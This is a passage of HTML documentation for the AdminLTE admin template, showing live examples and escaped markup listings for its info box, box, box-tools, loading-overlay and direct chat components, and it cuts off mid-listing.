    &LT;span class="info-box-number">93,139&LT;/span>
  &LT;/div>&LT;!-- /.info-box-content -->
&LT;/div>&LT;!-- /.info-box --></code></pre>

  <h4>Second Type of Info Boxes</h4>
  <div class="row">
    <div class="col-md-3 col-sm-6 col-xs-12">
      <div class="info-box bg-aqua">
        <span class="info-box-icon"><i class="fa fa-bookmark-o"></i></span>
        <div class="info-box-content">
          <span class="info-box-text">Bookmarks</span>
          <span class="info-box-number">41,410</span>
          <div class="progress">
            <div class="progress-bar" style="width: 70%"></div>
          </div>
          <span class="progress-description">
            70% Increase in 30 Days
          </span>
        </div><!-- /.info-box-content -->
      </div><!-- /.info-box -->
    </div><!-- /.col -->
    <div class="col-md-3 col-sm-6 col-xs-12">
      <div class="info-box bg-green">
        <span class="info-box-icon"><i class="fa fa-thumbs-o-up"></i></span>
        <div class="info-box-content">
          <span class="info-box-text">Likes</span>
          <span class="info-box-number">41,410</span>
          <div class="progress">
            <div class="progress-bar" style="width: 70%"></div>
          </div>
          <span class="progress-description">
            70% Increase in 30 Days
          </span>
        </div><!-- /.info-box-content -->
      </div><!-- /.info-box -->
    </div><!-- /.col -->
    <div class="col-md-3 col-sm-6 col-xs-12">
      <div class="info-box bg-yellow">
        <span class="info-box-icon"><i class="fa fa-calendar"></i></span>
        <div class="info-box-content">
          <span class="info-box-text">Events</span>
          <span class="info-box-number">41,410</span>
          <div class="progress">
            <div class="progress-bar" style="width: 70%"></div>
          </div>
          <span class="progress-description">
            70% Increase in 30 Days
          </span>
        </div><!-- /.info-box-content -->
      </div><!-- /.info-box -->
    </div><!-- /.col -->
    <div class="col-md-3 col-sm-6 col-xs-12">
      <div class="info-box bg-red">
        <span class="info-box-icon"><i class="fa fa-comments-o"></i></span>
        <div class="info-box-content">
          <span class="info-box-text">Comments</span>
          <span class="info-box-number">41,410</span>
          <div class="progress">
            <div class="progress-bar" style="width: 70%"></div>
          </div>
          <span class="progress-description">
            70% Increase in 30 Days
          </span>
        </div><!-- /.info-box-content -->
      </div><!-- /.info-box -->
    </div><!-- /.col -->
  </div><!-- /.row -->
  <p class="lead">Markup</p>
  <pre class="prettyprint"><code class="lang-html">&LT;!-- Apply any bg-* class to to the info-box to color it -->
&LT;div class="info-box bg-red">
  &LT;span class="info-box-icon">&LT;i class="fa fa-comments-o">&LT;/i>&LT;/span>
  &LT;div class="info-box-content">
    &LT;span class="info-box-text">Likes&LT;/span>
    &LT;span class="info-box-number">41,410&LT;/span>
    &LT;!-- The progress section is optional -->
    &LT;div class="progress">
      &LT;div class="progress-bar" style="width: 70%">&LT;/div>
    &LT;/div>
    &LT;span class="progress-description">
      70% Increase in 30 Days
    &LT;/span>
  &LT;/div>&LT;!-- /.info-box-content -->
&LT;/div>&LT;!-- /.info-box --></code></pre>
  <p class="lead">The only thing you need to change to alternate between these style is change the placement of the bg-* class. For the
    first style apply any bg-* class to the icon itself. For the other style, apply the bg-* class to the info-box div.</p>
  <!-- ===================================================================== -->

  <h3 id="component-box">Box</h3>
  <p class="lead">The box component is the most widely used component through out this template. You can
    use it for anything from displaying charts to just blocks of text. It comes in many different
    styles that we will explore below.</p>
  <h4>Default Box Markup</h4>
  <div class="box">
    <div class="box-header with-border">
      <h3 class="box-title">Default Box Example</h3>
      <div class="box-tools pull-right">
        <!-- Buttons, labels, and many other things can be placed here! -->
        <!-- Here is a label for example -->
        <span class="label label-primary">Label</span>
      </div><!-- /.box-tools -->
    </div><!-- /.box-header -->
    <div class="box-body">
      The body of the box
    </div><!-- /.box-body -->
    <div class="box-footer">
      The footer of the box
    </div><!-- box-footer -->
  </div><!-- /.box -->
  <pre class="prettyprint">&LT;div class="box">
  &LT;div class="box-header with-border">
    &LT;h3 class="box-title">Default Box Example&LT;/h3>
    &LT;div class="box-tools pull-right">
      &LT;!-- Buttons, labels, and many other things can be placed here! -->
      &LT;!-- Here is a label for example -->
      &LT;span class="label label-primary">Label&LT;/span>
    &LT;/div>&LT;!-- /.box-tools -->
  &LT;/div>&LT;!-- /.box-header -->
  &LT;div class="box-body">
    The body of the box
  &LT;/div>&LT;!-- /.box-body -->
  &LT;div class="box-footer">
    The footer of the box
  &LT;/div>&LT;!-- box-footer -->
&LT;/div>&LT;!-- /.box --></pre>
  <h4>Box Variants</h4>
  <p class="lead">You can change the style of the box by adding any of the contextual classes.</p>
  <div class="row">
    <div class="col-md-4">
      <div class="box">
        <div class="box-header with-border">
          <h3 class="box-title">Default Box Example</h3>
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
    </div>
    <div class="col-md-4">
      <div class="box box-primary">
        <div class="box-header with-border">
          <h3 class="box-title">Primary Box Example</h3>
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
    </div>
    <div class="col-md-4">
      <div class="box box-info">
        <div class="box-header with-border">
          <h3 class="box-title">Info Box Example</h3>
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
    </div>
    <div class="clearfix"></div>
    <div class="col-md-4">
      <div class="box box-warning">
        <div class="box-header with-border">
          <h3 class="box-title">Warning Box Example</h3>
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
    </div>
    <div class="col-md-4">
      <div class="box box-success">
        <div class="box-header with-border">
          <h3 class="box-title">Success Box Example</h3>
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
    </div>
    <div class="col-md-4">
      <div class="box box-danger">
        <div class="box-header with-border">
          <h3 class="box-title">Danger Box Example</h3>
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
    </div>
  </div><!-- /.row -->
  <pre class="prettyprint">&LT;div class="box box-default">...&LT;/div>
&LT;div class="box box-primary">...&LT;/div>
&LT;div class="box box-info">...&LT;/div>
&LT;div class="box box-warning">...&LT;/div>
&LT;div class="box box-success">...&LT;/div>
&LT;div class="box box-danger">...&LT;/div></pre>

  <h4>Solid Box</h4>
  <p class="lead">Solid Boxes are alternative ways to display boxes.
    They can be created by simply adding the box-solid class to the box component.
    You may also use contextual classes with you solid boxes.</p>
  <div class="row">
    <div class="col-md-4">
      <div class="box box-solid box-default">
        <div class="box-header">
          <h3 class="box-title">Default Solid Box Example</h3>
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
    </div>
    <div class="col-md-4">
      <div class="box box-solid box-primary">
        <div class="box-header">
          <h3 class="box-title">Primary Solid Box Example</h3>
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
    </div>
    <div class="col-md-4">
      <div class="box box-solid box-info">
        <div class="box-header">
          <h3 class="box-title">Info Solid Box Example</h3>
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
    </div>
    <div class="clearfix"></div>
    <div class="col-md-4">
      <div class="box box-solid box-warning">
        <div class="box-header">
          <h3 class="box-title">Warning Solid Box Example</h3>
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
    </div>
    <div class="col-md-4">
      <div class="box box-solid box-success">
        <div class="box-header">
          <h3 class="box-title">Success Solid Box Example</h3>
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
    </div>
    <div class="col-md-4">
      <div class="box box-solid box-danger">
        <div class="box-header">
          <h3 class="box-title">Danger Solid Box Example</h3>
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
    </div>
  </div><!-- /.row -->
  <pre class="prettyprint">
&LT;div class="box box-solid box-default">...&LT;/div>
&LT;div class="box box-solid box-primary">...&LT;/div>
&LT;div class="box box-solid box-info">...&LT;/div>
&LT;div class="box box-solid box-warning">...&LT;/div>
&LT;div class="box box-solid box-success">...&LT;/div>
&LT;div class="box box-solid box-danger">...&LT;/div></pre>
  <h4>Box Tools</h4>
  <p class="lead">Boxes can contain tools to deploy a specific event or provide simple info. The following examples makes use
    of multiple AdminLTE components within the header of the box.</p>
  <p>AdminLTE data-widget attribute provides boxes with the ability to collapse or be removed. The buttons
    are placed in the box-tools which is placed in the box-header.</p>
  <pre class="prettyprint">
&LT;!-- This will cause the box to be removed when clicked -->
&LT;button class="btn btn-box-tool" data-widget="remove" data-toggle="tooltip" title="Remove">&LT;i class="fa fa-times">&LT;/i>&LT;/button>
&LT;!-- This will cause the box to collapse when clicked -->
&LT;button class="btn btn-box-tool" data-widget="collapse" data-toggle="tooltip" title="Collapse">&LT;i class="fa fa-minus">&LT;/i>&LT;/button></pre>
  <div class="row">
    <div class="col-md-4">
      <div class="box box-default">
        <div class="box-header with-border">
          <h3 class="box-title">Collapsable</h3>
          <div class="box-tools pull-right">
            <button class="btn btn-box-tool" data-widget="collapse"><i class="fa fa-minus"></i></button>
          </div><!-- /.box-tools -->
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
      <pre class="prettyprint">
&LT;div class="box box-default">
  &LT;div class="box-header with-border">
    &LT;h3 class="box-title">Collapsable&LT;/h3>
    &LT;div class="box-tools pull-right">
      &LT;button class="btn btn-box-tool" data-widget="collapse">&LT;i class="fa fa-minus">&LT;/i>&LT;/button>
    &LT;/div>&LT;!-- /.box-tools -->
  &LT;/div>&LT;!-- /.box-header -->
  &LT;div class="box-body">
    The body of the box
  &LT;/div>&LT;!-- /.box-body -->
&LT;/div>&LT;!-- /.box --></pre>
    </div>
    <div class="col-md-4">
      <div class="box box-default">
        <div class="box-header with-border">
          <h3 class="box-title">Removable</h3>
          <div class="box-tools pull-right">
            <button class="btn btn-box-tool" data-widget="remove"><i class="fa fa-times"></i></button>
          </div><!-- /.box-tools -->
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
      <pre class="prettyprint">
&LT;div class="box box-default">
  &LT;div class="box-header with-border">
    &LT;h3 class="box-title">Removable&LT;/h3>
    &LT;div class="box-tools pull-right">
      &LT;button class="btn btn-box-tool" data-widget="remove">&LT;i class="fa fa-times">&LT;/i>&LT;/button>
    &LT;/div>&LT;!-- /.box-tools -->
  &LT;/div>&LT;!-- /.box-header -->
  &LT;div class="box-body">
    The body of the box
  &LT;/div>&LT;!-- /.box-body -->
&LT;/div>&LT;!-- /.box --></pre>
    </div>
    <div class="col-md-4">
      <div class="box box-default collapsed-box">
        <div class="box-header with-border">
          <h3 class="box-title">Expandable</h3>
          <div class="box-tools pull-right">
            <button class="btn btn-box-tool" data-widget="collapse"><i class="fa fa-plus"></i></button>
          </div><!-- /.box-tools -->
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
      <pre class="prettyprint">
&LT;div class="box box-default collapsed-box">
  &LT;div class="box-header with-border">
    &LT;h3 class="box-title">Expandable&LT;/h3>
    &LT;div class="box-tools pull-right">
      &LT;button class="btn btn-box-tool" data-widget="collapse">&LT;i class="fa fa-plus">&LT;/i>&LT;/button>
    &LT;/div>&LT;!-- /.box-tools -->
  &LT;/div>&LT;!-- /.box-header -->
  &LT;div class="box-body">
    The body of the box
  &LT;/div>&LT;!-- /.box-body -->
&LT;/div>&LT;!-- /.box --></pre>
    </div>
  </div><!-- /.row -->
  <p>We can also add labels, badges, pagination, tooltips, inputs and many more in the box tools. A few examples:</p>
  <div class="row">
    <div class="col-md-4">
      <div class="box box-default">
        <div class="box-header with-border">
          <h3 class="box-title">Labels</h3>
          <div class="box-tools pull-right">
            <span class="label label-default">Some Label</span>
          </div><!-- /.box-tools -->
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
      <pre class="prettyprint">
&LT;div class="box box-default">
  &LT;div class="box-header with-border">
    &LT;h3 class="box-title">Labels&LT;/h3>
    &LT;div class="box-tools pull-right">
      &LT;span class="label label-default">8 New Messages&LT;/span>
    &LT;/div>&LT;!-- /.box-tools -->
  &LT;/div>&LT;!-- /.box-header -->
  &LT;div class="box-body">
    The body of the box
  &LT;/div>&LT;!-- /.box-body -->
&LT;/div>&LT;!-- /.box --></pre>
    </div>
    <div class="col-md-4">
      <div class="box box-default">
        <div class="box-header with-border">
          <h3 class="box-title">Input</h3>
          <div class="box-tools pull-right">
            <div class="has-feedback">
              <input type="text" class="form-control input-sm" placeholder="Search...">
              <span class="glyphicon glyphicon-search form-control-feedback text-muted"></span>
            </div>
          </div><!-- /.box-tools -->
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
      <pre class="prettyprint">
&LT;div class="box box-default">
  &LT;div class="box-header with-border">
    &LT;h3 class="box-title">Input&LT;/h3>
    &LT;div class="box-tools pull-right">
      &LT;div class="has-feedback">
        &LT;input type="text" class="form-control input-sm" placeholder="Search...">
        &LT;span class="glyphicon glyphicon-search form-control-feedback">&LT;/span>
      &LT;/div>
    &LT;/div>&LT;!-- /.box-tools -->
  &LT;/div>&LT;!-- /.box-header -->
  &LT;div class="box-body">
    The body of the box
  &LT;/div>&LT;!-- /.box-body -->
&LT;/div>&LT;!-- /.box --></pre>
    </div>
    <div class="col-md-4">
      <div class="box box-default">
        <div class="box-header with-border">
          <h3 class="box-title">Tootips on buttons</h3>
          <div class="box-tools pull-right">
            <button class="btn btn-box-tool" data-widget="collapse" data-toggle="tooltip" title="Collapse"><i class="fa fa-minus"></i></button>
            <button class="btn btn-box-tool" data-widget="remove" data-toggle="tooltip" title="Remove"><i class="fa fa-times"></i></button>
          </div><!-- /.box-tools -->
        </div><!-- /.box-header -->
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
      </div><!-- /.box -->
      <pre class="prettyprint">
&LT;div class="box box-default">
  &LT;div class="box-header with-border">
    &LT;h3 class="box-title">Tooltips on buttons&LT;/h3>
    &LT;div class="box-tools pull-right">
      &LT;button class="btn btn-box-tool" data-widget="collapse" data-toggle="tooltip" title="Collapse">&LT;i class="fa fa-minus">&LT;/i>&LT;/button>
      &LT;button class="btn btn-box-tool" data-widget="remove" data-toggle="tooltip" title="Remove">&LT;i class="fa fa-times">&LT;/i>&LT;/button>
    &LT;/div>&LT;!-- /.box-tools -->
  &LT;/div>&LT;!-- /.box-header -->
  &LT;div class="box-body">
    The body of the box
  &LT;/div>&LT;!-- /.box-body -->
&LT;/div>&LT;!-- /.box --></pre>
    </div><!-- /.col -->
  </div><!-- /.row -->
  <p>
    If you inserted a box into the document after <code>app.js</code> was loaded, you have to activate
    the collapse/remove buttons explicitly by calling <code>.activateBox()</code>:
  </p>
  <pre class="prettyprint"><code class="html">&LT;script>
    $("#box-widget").activateBox();
&LT;/script></code></pre>

  <h4>Loading States</h4>
  <div class="row">
    <div class="col-md-6">
      <div class="box box-default">
        <div class="box-header with-border">
          <h3 class="box-title">Loading state</h3>
        </div>
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
        <!-- Loading (remove the following to stop the loading)-->
        <div class="overlay">
          <i class="fa fa-refresh fa-spin"></i>
        </div>
        <!-- end loading -->
      </div><!-- /.box -->
    </div><!-- /.col -->

    <div class="col-md-6">
      <div class="box box-default box-solid">
        <div class="box-header with-border">
          <h3 class="box-title">Loading state (.box-solid)</h3>
        </div>
        <div class="box-body">
          The body of the box
        </div><!-- /.box-body -->
        <!-- Loading (remove the following to stop the loading)-->
        <div class="overlay">
          <i class="fa fa-refresh fa-spin"></i>
        </div>
        <!-- end loading -->
      </div><!-- /.box -->
    </div><!-- /.col -->
  </div><!-- /.row -->
  <p class="lead">
    To simulate a loading state, simply place this code before the <code>.box</code> closing tag.
  </p>
  <pre class="prettyprint"><code class="html">&LT;div class="overlay">
  &LT;i class="fa fa-refresh fa-spin">&LT;/i>
&LT;/div>
</code></pre>
  <h3 id="component-direct-chat">Direct Chat</h3>
  <p class="lead">The direct chat widget extends the box component to create a beautiful chat interface. This widget
    consists of a required messages pane and an <b>optional</b> contacts pane. Examples:</p>
  <!-- Direct Chat -->
  <div class="row">
    <div class="col-md-3">
      <!-- DIRECT CHAT PRIMARY -->
      <div class="box box-primary direct-chat direct-chat-primary">
        <div class="box-header with-border">
          <h3 class="box-title">Direct Chat</h3>
          <div class="box-tools pull-right">
            <span data-toggle="tooltip" title="3 New Messages" class="badge bg-light-blue">3</span>
            <button class="btn btn-box-tool" data-widget="collapse"><i class="fa fa-minus"></i></button>
            <button class="btn btn-box-tool" data-toggle="tooltip" title="Contacts" data-widget="chat-pane-toggle"><i class="fa fa-comments"></i></button>
            <button class="btn btn-box-tool" data-widget="remove"><i class="fa fa-times"></i></button>
          </div>
        </div><!-- /.box-header -->
        <div class="box-body">
          <!-- Conversations are loaded here -->
          <div class="direct-chat-messages">
            <!-- Message. Default to the left -->
            <div class="direct-chat-msg">
              <div class="direct-chat-info clearfix">
                <span class="direct-chat-name pull-left">Alexander Pierce</span>
                <span class="direct-chat-timestamp pull-right">23 Jan 2:00 pm</span>
              </div><!-- /.direct-chat-info -->
              <img class="direct-chat-img" src="../dist/img/user1-128x128.jpg" alt="message user image"><!-- /.direct-chat-img -->
              <div class="direct-chat-text">
                Is this template really for free? That's unbelievable!
              </div><!-- /.direct-chat-text -->
            </div><!-- /.direct-chat-msg -->

            <!-- Message to the right -->
            <div class="direct-chat-msg right">
              <div class="direct-chat-info clearfix">
                <span class="direct-chat-name pull-right">Sarah Bullock</span>
                <span class="direct-chat-timestamp pull-left">23 Jan 2:05 pm</span>
              </div><!-- /.direct-chat-info -->
              <img class="direct-chat-img" src="../dist/img/user3-128x128.jpg" alt="message user image"><!-- /.direct-chat-img -->
              <div class="direct-chat-text">
                You better believe it!
              </div><!-- /.direct-chat-text -->
            </div><!-- /.direct-chat-msg -->
          </div><!--/.direct-chat-messages-->

          <!-- Contacts are loaded here -->
          <div class="direct-chat-contacts">
            <ul class="contacts-list">
              <li>
                <a href="#">
                  <img class="contacts-list-img" src="../dist/img/user1-128x128.jpg" alt="Contact Avatar">
                  <div class="contacts-list-info">
                    <span class="contacts-list-name">
                      Count Dracula
                      <small class="contacts-list-date pull-right">2/28/2015</small>
                    </span>
                    <span class="contacts-list-msg">How have you been? I was...</span>
                  </div><!-- /.contacts-list-info -->
                </a>
              </li><!-- End Contact Item -->
            </ul><!-- /.contatcts-list -->
          </div><!-- /.direct-chat-pane -->
        </div><!-- /.box-body -->
        <div class="box-footer">
          <form action="#" method="post">
            <div class="input-group">
              <input type="text" name="message" placeholder="Type Message ..." class="form-control">
              <span class="input-group-btn">
                <button type="button" class="btn btn-primary btn-flat">Send</button>
              </span>
            </div>
          </form>
        </div><!-- /.box-footer-->
      </div><!--/.direct-chat -->
    </div><!-- /.col -->

    <div class="col-md-3">
      <!-- DIRECT CHAT SUCCESS -->
      <div class="box box-success direct-chat direct-chat-success">
        <div class="box-header with-border">
          <h3 class="box-title">Direct Chat</h3>
          <div class="box-tools pull-right">
            <span data-toggle="tooltip" title="3 New Messages" class="badge bg-green">3</span>
            <button class="btn btn-box-tool" data-widget="collapse"><i class="fa fa-minus"></i></button>
            <button class="btn btn-box-tool" data-toggle="tooltip" title="Contacts" data-widget="chat-pane-toggle"><i class="fa fa-comments"></i></button>
            <button class="btn btn-box-tool" data-widget="remove"><i class="fa fa-times"></i></button>
          </div>
        </div><!-- /.box-header -->
        <div class="box-body">
          <!-- Conversations are loaded here -->
          <div class="direct-chat-messages">
            <!-- Message. Default to the left -->
            <div class="direct-chat-msg">
              <div class="direct-chat-info clearfix">
                <span class="direct-chat-name pull-left">Alexander Pierce</span>
                <span class="direct-chat-timestamp pull-right">23 Jan 2:00 pm</span>
              </div><!-- /.direct-chat-info -->
              <img class="direct-chat-img" src="../dist/img/user1-128x128.jpg" alt="message user image"><!-- /.direct-chat-img -->
              <div class="direct-chat-text">
                Is this template really for free? That's unbelievable!
              </div><!-- /.direct-chat-text -->
            </div><!-- /.direct-chat-msg -->

            <!-- Message to the right -->
            <div class="direct-chat-msg right">
              <div class="direct-chat-info clearfix">
                <span class="direct-chat-name pull-right">Sarah Bullock</span>
                <span class="direct-chat-timestamp pull-left">23 Jan 2:05 pm</span>
              </div><!-- /.direct-chat-info -->
              <img class="direct-chat-img" src="../dist/img/user3-128x128.jpg" alt="message user image"><!-- /.direct-chat-img -->
              <div class="direct-chat-text">
                You better believe it!
              </div><!-- /.direct-chat-text -->
            </div><!-- /.direct-chat-msg -->
          </div><!--/.direct-chat-messages-->

          <!-- Contacts are loaded here -->
          <div class="direct-chat-contacts">
            <ul class="contacts-list">
              <li>
                <a href="#">
                  <img class="contacts-list-img" src="../dist/img/user1-128x128.jpg" alt="Contact Avatar">
                  <div class="contacts-list-info">
                    <span class="contacts-list-name">
                      Count Dracula
                      <small class="contacts-list-date pull-right">2/28/2015</small>
                    </span>
                    <span class="contacts-list-msg">How have you been? I was...</span>
                  </div><!-- /.contacts-list-info -->
                </a>
              </li><!-- End Contact Item -->
            </ul><!-- /.contatcts-list -->
          </div><!-- /.direct-chat-pane -->
        </div><!-- /.box-body -->
        <div class="box-footer">
          <form action="#" method="post">
            <div class="input-group">
              <input type="text" name="message" placeholder="Type Message ..." class="form-control">
              <span class="input-group-btn">
                <button type="button" class="btn btn-success btn-flat">Send</button>
              </span>
            </div>
          </form>
        </div><!-- /.box-footer-->
      </div><!--/.direct-chat -->
    </div><!-- /.col -->

    <div class="col-md-3">
      <!-- DIRECT CHAT WARNING -->
      <div class="box box-warning direct-chat direct-chat-warning">
        <div class="box-header with-border">
          <h3 class="box-title">Direct Chat</h3>
          <div class="box-tools pull-right">
            <span data-toggle="tooltip" title="3 New Messages" class="badge bg-yellow">3</span>
            <button class="btn btn-box-tool" data-widget="collapse"><i class="fa fa-minus"></i></button>
            <button class="btn btn-box-tool" data-toggle="tooltip" title="Contacts" data-widget="chat-pane-toggle"><i class="fa fa-comments"></i></button>
            <button class="btn btn-box-tool" data-widget="remove"><i class="fa fa-times"></i></button>
          </div>
        </div><!-- /.box-header -->
        <div class="box-body">
          <!-- Conversations are loaded here -->
          <div class="direct-chat-messages">
            <!-- Message. Default to the left -->
            <div class="direct-chat-msg">
              <div class="direct-chat-info clearfix">
                <span class="direct-chat-name pull-left">Alexander Pierce</span>
                <span class="direct-chat-timestamp pull-right">23 Jan 2:00 pm</span>
              </div><!-- /.direct-chat-info -->
              <img class="direct-chat-img" src="../dist/img/user1-128x128.jpg" alt="message user image"><!-- /.direct-chat-img -->
              <div class="direct-chat-text">
                Is this template really for free? That's unbelievable!
              </div><!-- /.direct-chat-text -->
            </div><!-- /.direct-chat-msg -->

            <!-- Message to the right -->
            <div class="direct-chat-msg right">
              <div class="direct-chat-info clearfix">
                <span class="direct-chat-name pull-right">Sarah Bullock</span>
                <span class="direct-chat-timestamp pull-left">23 Jan 2:05 pm</span>
              </div><!-- /.direct-chat-info -->
              <img class="direct-chat-img" src="../dist/img/user3-128x128.jpg" alt="message user image"><!-- /.direct-chat-img -->
              <div class="direct-chat-text">
                You better believe it!
              </div><!-- /.direct-chat-text -->
            </div><!-- /.direct-chat-msg -->
          </div><!--/.direct-chat-messages-->

          <!-- Contacts are loaded here -->
          <div class="direct-chat-contacts">
            <ul class="contacts-list">
              <li>
                <a href="#">
                  <img class="contacts-list-img" src="../dist/img/user1-128x128.jpg" alt="Contact Avatar">
                  <div class="contacts-list-info">
                    <span class="contacts-list-name">
                      Count Dracula
                      <small class="contacts-list-date pull-right">2/28/2015</small>
                    </span>
                    <span class="contacts-list-msg">How have you been? I was...</span>
                  </div><!-- /.contacts-list-info -->
                </a>
              </li><!-- End Contact Item -->
            </ul><!-- /.contatcts-list -->
          </div><!-- /.direct-chat-pane -->
        </div><!-- /.box-body -->
        <div class="box-footer">
          <form action="#" method="post">
            <div class="input-group">
              <input type="text" name="message" placeholder="Type Message ..." class="form-control">
              <span class="input-group-btn">
                <button type="button" class="btn btn-warning btn-flat">Send</button>
              </span>
            </div>
          </form>
        </div><!-- /.box-footer-->
      </div><!--/.direct-chat -->
    </div><!-- /.col -->

    <div class="col-md-3">
      <!-- DIRECT CHAT DANGER -->
      <div class="box box-danger direct-chat direct-chat-danger">
        <div class="box-header with-border">
          <h3 class="box-title">Direct Chat</h3>
          <div class="box-tools pull-right">
            <span data-toggle="tooltip" title="3 New Messages" class="badge bg-red">3</span>
            <button class="btn btn-box-tool" data-widget="collapse"><i class="fa fa-minus"></i></button>
            <button class="btn btn-box-tool" data-toggle="tooltip" title="Contacts" data-widget="chat-pane-toggle"><i class="fa fa-comments"></i></button>
            <button class="btn btn-box-tool" data-widget="remove"><i class="fa fa-times"></i></button>
          </div>
        </div><!-- /.box-header -->
        <div class="box-body">
          <!-- Conversations are loaded here -->
          <div class="direct-chat-messages">
            <!-- Message. Default to the left -->
            <div class="direct-chat-msg">
              <div class="direct-chat-info clearfix">
                <span class="direct-chat-name pull-left">Alexander Pierce</span>
                <span class="direct-chat-timestamp pull-right">23 Jan 2:00 pm</span>
              </div><!-- /.direct-chat-info -->
              <img class="direct-chat-img" src="../dist/img/user1-128x128.jpg" alt="message user image"><!-- /.direct-chat-img -->
              <div class="direct-chat-text">
                Is this template really for free? That's unbelievable!
              </div><!-- /.direct-chat-text -->
            </div><!-- /.direct-chat-msg -->

            <!-- Message to the right -->
            <div class="direct-chat-msg right">
              <div class="direct-chat-info clearfix">
                <span class="direct-chat-name pull-right">Sarah Bullock</span>
                <span class="direct-chat-timestamp pull-left">23 Jan 2:05 pm</span>
              </div><!-- /.direct-chat-info -->
              <img class="direct-chat-img" src="../dist/img/user3-128x128.jpg" alt="message user image"><!-- /.direct-chat-img -->
              <div class="direct-chat-text">
                You better believe it!
              </div><!-- /.direct-chat-text -->
            </div><!-- /.direct-chat-msg -->
          </div><!--/.direct-chat-messages-->

          <!-- Contacts are loaded here -->
          <div class="direct-chat-contacts">
            <ul class="contacts-list">
              <li>
                <a href="#">
                  <img class="contacts-list-img" src="../dist/img/user1-128x128.jpg" alt="Contact Avatar">
                  <div class="contacts-list-info">
                    <span class="contacts-list-name">
                      Count Dracula
                      <small class="contacts-list-date pull-right">2/28/2015</small>
                    </span>
                    <span class="contacts-list-msg">How have you been? I was...</span>
                  </div><!-- /.contacts-list-info -->
                </a>
              </li><!-- End Contact Item -->
            </ul><!-- /.contatcts-list -->
          </div><!-- /.direct-chat-pane -->
        </div><!-- /.box-body -->
        <div class="box-footer">
          <form action="#" method="post">
            <div class="input-group">
              <input type="text" name="message" placeholder="Type Message ..." class="form-control">
              <span class="input-group-btn">
                <button type="button" class="btn btn-danger btn-flat">Send</button>
              </span>
            </div>
          </form>
        </div><!-- /.box-footer-->
      </div><!--/.direct-chat -->
    </div><!-- /.col -->
  </div><!-- /.row -->
  <p class="lead">Direct Chat Markup</p>
  <pre class="prettyprint"><code class="html">
&LT;!-- Construct the box with style you want. Here we are using box-danger -->
&LT;!-- Then add the class direct-chat and choose the direct-chat-* contexual class -->
&LT;!-- The contextual class should match the box, so we are using direct-chat-danger -->
&LT;div class="box box-danger direct-chat direct-chat-danger">
  &LT;div class="box-header with-border">
    &LT;h3 class="box-title">Direct Chat&LT;/h3>
    &LT;div class="box-tools pull-right">
      &LT;span data-toggle="tooltip" title="3 New Messages" class="badge bg-red">3&LT;/span>
      &LT;button class="btn btn-box-tool" data-widget="collapse">&LT;i class="fa fa-minus">&LT;/i>&LT;/button>
      &LT;!-- In box-tools add this button if you intend to use the contacts pane -->
      &LT;button class="btn btn-box-tool" data-toggle="tooltip" title="Contacts" data-widget="chat-pane-toggle">&LT;i class="fa fa-comments">&LT;/i>&LT;/button>
      &LT;button class="btn btn-box-tool" data-widget="remove">&LT;i class="fa fa-times">&LT;/i>&LT;/button>
    &LT;/div>
  &LT;/div>&LT;!-- /.box-header -->
  &LT;div class="box-body">
    &LT;!-- Conversations are loaded here -->
    &LT;div class="direct-chat-messages">
      &LT;!-- Message. Default to the left -->
      &LT;div class="direct-chat-msg">
        &LT;div class="direct-chat-info clearfix">
          &LT;span class="direct-chat-name pull-left">Alexander Pierce&LT;/span>
          &LT;span class="direct-chat-timestamp pull-right">23 Jan 2:00 pm&LT;/span>
        &LT;/div>&LT;!-- /.direct-chat-info -->
        &LT;img class="direct-chat-img" src="../dist/img/user1-128x128.jpg" alt="message user image">&LT;!-- /.direct-chat-img -->
        &LT;div class="direct-chat-text">
          Is this template really for free? That's unbelievable!
        &LT;/div>&LT;!-- /.direct-chat-text -->
      &LT;/div>&LT;!-- /.direct-chat-msg -->

      &LT;!-- Message to the right -->
      &LT;div class="direct-chat-msg right">
        &LT;div class="direct-chat-info clearfix">
          &LT;span class="direct-chat-name pull-right">Sarah Bullock&LT;/span>
          &LT;span class="direct-chat-timestamp pull-left">23 Jan 2:05 pm&LT;/span>
        &LT;/div>&LT;!-- /.direct-chat-info -->
        &LT;img class="direct-chat-img" src="../dist/img/user3-128x128.jpg" alt="message user image">&LT;!-- /.direct-chat-img -->
        &LT;div class="direct-chat-text">
          You better believe it!
        &LT;/div>&LT;!-- /.direct-chat-text -->
      &LT;/div>&LT;!-- /.direct-chat-msg -->
    &LT;/div>&LT;!--/.direct-chat-messages-->

    &LT;!-- Contacts are loaded here -->
    &LT;div class="direct-chat-contacts">
      &LT;ul class="contacts-list">
        &LT;li>
          &LT;a href="#">
